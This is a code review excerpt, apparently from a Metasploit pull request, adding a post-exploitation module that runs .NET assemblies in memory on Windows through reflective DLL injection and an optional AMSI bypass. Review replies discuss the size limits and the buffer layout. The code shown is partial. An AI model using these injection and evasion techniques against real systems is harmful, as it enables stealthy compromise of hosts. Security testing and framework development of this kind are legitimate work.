modules/post/windows/manage/execute_assembly.rb

```diff
@@ -0,0 +1,195 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/windows/reflective_dll_injection'
+
+class MetasploitModule < Msf::Post
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name' => 'Execute .net Assembly (x64 only)',
+                      'Description' => '
+                      This module execute a .net assembly in memory.
+                      Refletctively load the dll that host CLR, than
+                      copy in memory the assembly that will be executed.
+                      Credits for Amsi bypass to Rastamouse (@_RastaMouse)
+                      ',
+                      'License' => MSF_LICENSE,
+                      'Author' => 'b4rtik',
+                      'Arch' => [ARCH_X64],
+                      'Platform' => 'win',
+                      'SessionTypes' => ['meterpreter'],
+                      'Targets' => [
+                        ['Windows x64 (<= 10)', { 'Arch' => ARCH_X64 }]
+                      ],
+                      'References' => [
+                        ['URL', 'https://b4rtik.blogspot.com/2018/12/execute-assembly-via-meterpreter-session.html']
+                      ],
+                      'DefaultTarget' => 0))
+    register_options(
+      [
+        OptString.new('ASSEMBLY', [true, 'Assembly file name']),
+        OptPath.new('ASSEMBLYPATH', [false, 'Assembly directory',
+                                     ::File.join(Msf::Config.data_directory,
+                                                 'execute-assembly')]),
+        OptString.new('ARGUMENTS', [false, 'Command line arguments']),
+        OptString.new('PROCESS', [false, 'Process to spawn','notepad.exe']),
+        OptInt.new('PID', [false, 'Pid  to inject', 0]),
+        OptBool.new('AMSIBYPASS', [true, 'Enable Amsi bypass', true]),
+        OptInt.new('WAIT', [false, 'Time in seconds to wait', 10])
+      ], self.class
+    )
+  end
+
+  def run
+    exe_path = gen_exe_path
+    assembly_size = File.size(exe_path)
+    client.response_timeout=20
+    params_size = if datastore['ARGUMENTS'].nil?
+                    0
+                  else
+                    datastore['ARGUMENTS'].length
+                  end
+
+    if assembly_size <= 1_024_000 && params_size <= 1_024
+      execute_assembly(exe_path)
+    else
+      if assembly_size > 1_024_000
```

Comment:
Why assembly size is limit to 1m? the limit is base on CLR or ReflectiveDLLInjection ?

Reply:
There is no reason. My notes go back a year ago and are poor. I have re-performed the tests and I am able to perform assembly even of 2.7M.
I made a version with dynamic assembly and args size. It remains to do just a bit of cleaning and I commit

Reply:
I modified the management of the parameters in this way:

1. The ruby ​​part write in memory the sequence: assemblysize(4 bytes) argssize 4 bytes) amsiflag(1 byte) args(argssize byte) assembly (assemblysize byte)
2. in the executeSharp method of HostingCLR.dll a first reading of 8 bytes is executed to determine the size of the assembly, of the args and of the whole buffer
3. A subsequent reading of the entire buffer